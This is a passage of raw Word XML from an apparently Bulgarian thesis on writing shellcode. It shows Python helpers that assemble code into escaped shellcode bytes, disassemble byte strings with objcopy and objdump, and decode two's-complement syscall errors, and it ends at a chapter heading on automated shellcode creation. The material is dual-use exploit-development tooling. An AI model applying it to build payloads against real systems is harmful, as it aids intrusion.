        <w:pStyle w:val="codeblock"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>def assemble(path):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>output = 'output.o'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>assembler = ['as', path, '-o', output]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>subprocess.run(assembler)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>with open(output, 'br') as file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>dec = elffile.ELFFile(file)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>shellcode = dec.get_section_by_name('.text').data()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00CF6AEC" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>print('"{}"'.format(''.join('\\x{:02x}'.format(b) for b in shellcode)))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRDefault="005F56EB" w:rsidP="00DD0DC6">
      <w:pPr>
        <w:pStyle w:val="figuretext"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Фигура </w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:noBreakHyphen/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: assemble.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Идеята за extract може да се разшири, като се асемблира кодът в един и същ скрипт. Това не е трудно и допълнително улеснява разработването. Това може да стане и с Makefile, но python улеснява последващото вграждане.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="82" w:name="_vc5tr73h0823" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="83" w:name="_Ref2190676"/>
      <w:bookmarkStart w:id="84" w:name="_Toc3540779"/>
      <w:bookmarkEnd w:id="82"/>
      <w:r w:rsidRPr="008227E1">
        <w:t>Disassemble</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83"/>
      <w:bookmarkEnd w:id="84"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">В exploitdb има голям набор от готови шелкод реализации. Недостатъкът им е, че повечето от тях са под форма на байтове, което е нечетимо. Тъй като кривата на учене при писането на </w:t>
      </w:r>
      <w:r w:rsidR="00B4067A">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>асемблер</w:t>
      </w:r>
      <w:r w:rsidR="00B4067A" w:rsidRPr="00112660">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>е много стръмна, е удобно, ако има мостри, от които да се взаимстват идеи. Библиотеката pwntools</w:t>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="000B2140" w:rsidRPr="00112660">
        <w:endnoteReference w:id="28"/>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> предоставя такава функционалност - функцията </w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>disasm()</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>. Не е подходящо включването на цялата библиотека за една функция, затова взаимствам идеята и представям своя по-проста реализация:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t>import subprocess</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>import re</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>tmp_file = 'elffile'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>obj_file = 'out'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>objfile_map = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>'amd64': ['i386:x86-64', 'elf64-x86-64'],</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>'x86': ['i386', 'elf32-i386']</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>def disassemble(shellcode, arch):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>arch, elf = objfile_map[arch]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t># parse from \x12 style encoding and store in bytearray to preserve endinanness</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>parsed = bytearray(shellcode.encode('ascii').decode('unicode_escape').encode('latin-1'))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>with open(tmp_file, 'bw') as file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>file.write(parsed)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>subprocess.run([</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>'objcopy',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>'-I', 'binary',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>'-O', elf,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>'-B', arch,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>'--set-section-flags', '.data=code', '--rename-section', '.data=.text', '-w', '-N', '*',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>tmp_file, obj_file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>disasm = subprocess.run(['objdump', '-d', obj_file], capture_output=True)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>ins = re.findall(r'\t[\S ]+\n', disasm.stdout.decode('ascii'))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>ins = [a.strip() for a in ins]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>print('\n'.join(ins))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRDefault="005F56EB" w:rsidP="00DD0DC6">
      <w:pPr>
        <w:pStyle w:val="figuretext"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Фигура </w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:noBreakHyphen/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ</w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> Фигура \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: disassemble.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Принципът на работа е следният: objdump може да деасемблира само ELF файлове до текстови инструкции. За да направим същото с обикновени байтове, трябва да ги сложим в такъв формат. Инструментът objcopy може да прави точно това, като му се задават архитектура и секцията, в която да сложи байтовете. Вече objdump може да деасемблира, а изходът се филтрира с подходящ регулярен израз (regulax expression).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="85" w:name="_j69c8zbqi4dp" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="86" w:name="_Toc3540780"/>
      <w:bookmarkEnd w:id="85"/>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="008227E1">
        <w:t>Two’s</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> complement”</w:t>
      </w:r>
      <w:bookmarkEnd w:id="86"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>За да могат да се различават грешките от валидните стойности, системните функции връщат отрицателна стойност при грешка. За лесна аритметика, отрицателните стойности се кодират в “two’s complement” още на хардуерно ниво.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00CF6AEC" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">При разработката на шелкод липсват абстракциите от C и структури като struct </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067A">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>sockaddr</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r w:rsidRPr="00B4067A">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>char **</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> трябва да се възпроизведат ръчно. Процесът не е лесен, заради подреждането на стойностите, и се допускат пропуски, които карат системните функции да връщат грешки. При дебъгване на тези грешки, gdb показва “two’s complement” на грешката, например 0xFFFFFFFFFFFFFF9F, което трудно се свързва с реалната стойност - -97 (EAFNOSUPPORT). За лесен преход може да се използва скрипт като следния:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">import sys </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">def twos_comp(val): </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">bits = val.bit_length() </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">comp = (val ^ (2 ** bits - 1)) + 1 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">return -comp </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">print(twos_comp(int(sys.argv[1], 16))) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRDefault="005F56EB" w:rsidP="00DD0DC6">
      <w:pPr>
        <w:pStyle w:val="figuretext"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Фигура </w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:noBreakHyphen/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: twos.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Начинът на работа е точно прилагане на “two’s complement” - всеки бит на стойността се обръща и се добавя 1. Връща се -comp, за да се възстанови знакът.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Преходът е по-сложен, отколкото в C, защото python използва числени типове с произволен размер, където “two’s complement” няма смисъл в обикновения си вид, защото новият бит за знак се интерпретира като по-голямо число. Например int(0xFFFFFFFFFFFFFF9F) няма да върне очакваното -97, а 18446744073709551519, което ни е безполезно. </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00875CB1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:hanging="180"/>
      </w:pPr>
      <w:bookmarkStart w:id="87" w:name="_b3duyy7wr53" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="88" w:name="_Toc3540781"/>
      <w:bookmarkEnd w:id="87"/>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t>Трета глава</w:t>
      </w:r>
      <w:r w:rsidR="00875CB1">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>Автоматизирано създаване на shellcode</w:t>
      </w:r>
      <w:bookmarkEnd w:id="88"/>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="89" w:name="_pxpy04cdtxb" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="90" w:name="_Toc3540782"/>
      <w:bookmarkEnd w:id="89"/>
      <w:r w:rsidRPr="008227E1">
        <w:t>Съществуващи</w:t>
